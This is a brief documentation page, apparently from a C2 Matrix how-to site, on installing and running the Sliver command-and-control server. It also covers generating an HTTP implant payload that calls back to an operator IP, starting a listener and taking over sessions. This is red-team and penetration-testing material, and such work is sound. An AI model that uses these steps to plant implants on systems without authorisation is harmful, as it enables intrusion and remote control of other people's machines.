> For the complete documentation index, see [llms.txt](https://howto.thec2matrix.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://howto.thec2matrix.com/c2/sliver.md).

# Sliver

## Install Sliver

Grab the URL for the latest release at <https://github.com/BishopFox/sliver/releases/>

```
mkdir /opt/sliver
cd /opt/sliver
wget <URL>
chmod +x sliver-server_linux
```

## Run Sliver

```bash
sudo /opt/sliver/sliver-server_linux
```

### Generate Payload

```bash
generate --http <IP>
http
```

### Interact with Agent

```bash
sessions
use <tab>
```
